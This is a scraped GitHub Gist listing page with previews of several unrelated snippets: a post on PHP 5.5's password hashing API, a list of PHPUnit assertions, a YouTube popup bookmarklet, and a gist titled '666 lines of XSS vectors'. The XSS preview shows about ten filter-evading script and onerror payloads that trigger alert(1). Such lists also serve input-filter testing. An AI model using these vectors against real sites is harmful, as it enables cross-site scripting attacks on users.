Skip to content

Instantly share code, notes, and snippets.

@nikic
nikic / password_hashing_api.md
Created September 12, 2012 15:04
The new Secure Password Hashing API in PHP 5.5

The new Secure Password Hashing API in PHP 5.5

The [RFC for a new simple to use password hashing API][rfc] has just been accepted for PHP 5.5. As the RFC itself is rather technical and most of the sample codes are something you should not use, I want to give a very quick overview of the new API:

Why do we need a new API?

Everybody knows that you should be hashing their passwords using bcrypt, but still a surprising number of developers uses insecure md5 or sha1 hashes (just look at the recent password leaks). One of the reasons for this is that the crypt() API is ridiculously hard to use and very prone to programming mistakes.

@JohannesHoppe
JohannesHoppe / 666_lines_of_XSS_vectors.html
Created May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@briankip
briankip / phpunit-assertions.md
Last active February 9, 2024 18:42
A list of PHPUnit assertions
  • assertArrayHasKey
  • assertArrayNotHasKey
  • assertContains
  • assertAttributeContains
  • assertNotContains
  • assertAttributeNotContains
  • assertContainsOnly
  • assertAttributeContainsOnly
  • assertNotContainsOnly
  • assertAttributeNotContainsOnly
@jonkpirateboy
jonkpirateboy / Distraction Free YouTube
Last active November 28, 2016 07:34
Put the code in a browser button. If you click it when watching a YouTube-video, the video will open in a pop up. Disctraction free and perfect for watching videos while "working".
javascript:yturl=window.location.href;ytarr=yturl.split("?v=");ytqs=ytarr[1];ytqs=ytqs.replace("&","?");ytelem=document.getElementById("movie_player");yttime=Math.floor(ytelem.getCurrentTime());document.getElementsByTagName("video")[0].pause();if(ytqs.indexOf("?")>-1){ytqsstart="&"}else{ytqsstart="?"}window.open("https://www.youtube.com/embed/"+ytqs+ytqsstart+"autoplay=1&start="+yttime,ytqs,"width=400,height=300");void(0);